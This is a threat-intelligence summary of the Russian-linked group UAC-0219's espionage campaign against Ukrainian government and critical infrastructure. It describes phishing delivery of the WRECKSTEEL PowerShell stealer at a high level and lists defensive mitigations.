Full Report
Ukraine’s Computer Emergency Response Team (CERT-UA) has identified a significant increase in cyber espionage activities targeting the nation,... The post Russian-linked UAC-0219 group escalates attacks on Ukraine government, critical infrastructure appeared first on Industrial Cyber.
Analysis Summary
# Threat Actor: UAC-0219
## Attribution & Identity
Activity attributed to a Russian-linked hacking group, identified by CERT-UA as UAC-0219.
## Activity Summary
UAC-0219 has escalated cyber espionage activities targeting Ukraine, active since at least the fall of 2024. The recent focus involves a significant increase in data theft operations against governmental entities and critical infrastructure operators in Ukraine. The group uses compromised internal accounts to distribute phishing emails containing malicious links.
## Tactics, Techniques & Procedures
- **Initial Access/Delivery:** Used phishing emails distributed via compromised accounts.
- **Execution:** Emails contained links pointing to public file-sharing services (DropMeFiles and Google Drive).
- **Action on Objectives:** Execution of a PowerShell script to exfiltrate data.
- **Data Collection:** Targeted text documents, PDFs, images, and presentations.
- **Persistence/Reconnaissance:** Capable of taking screenshots of infected devices.
- Malware variants observed include VBScript and PowerShell versions of the stealer.
## Targeting
- Sectors: Government, Critical Infrastructure.
- Geography: Ukraine.
- Victims: Ukrainian governmental entities and critical infrastructure operators.
## Tools & Infrastructure
- **Malware Families Used:** WRECKSTEEL PowerShell stealer (observed in PowerShell and VBScript variants).
- **Infrastructure (C2, domains, IPs):** DropMeFiles and Google Drive (used for initial payload hosting).
## Implications
UAC-0219 demonstrates a sustained cyber espionage focus on Ukrainian state apparatus and essential services. The use of compromised legitimate accounts and common file-sharing services suggests a mature approach to bypassing initial security controls and delivering their specific data-stealing malware, WRECKSTEEL.
## Mitigations
- Enhanced scrutiny and monitoring of emails originating from or referencing compromised internal accounts.
- Implement strict controls over the execution of PowerShell scripts originating from user interactions.
- Review policies regarding the loading of scripts/payloads from external file-sharing services like DropMeFiles and Google Drive in sensitive environments.
- Ensure robust detection mechanisms are in place for data exfiltration activities and mass file collection (documents, images).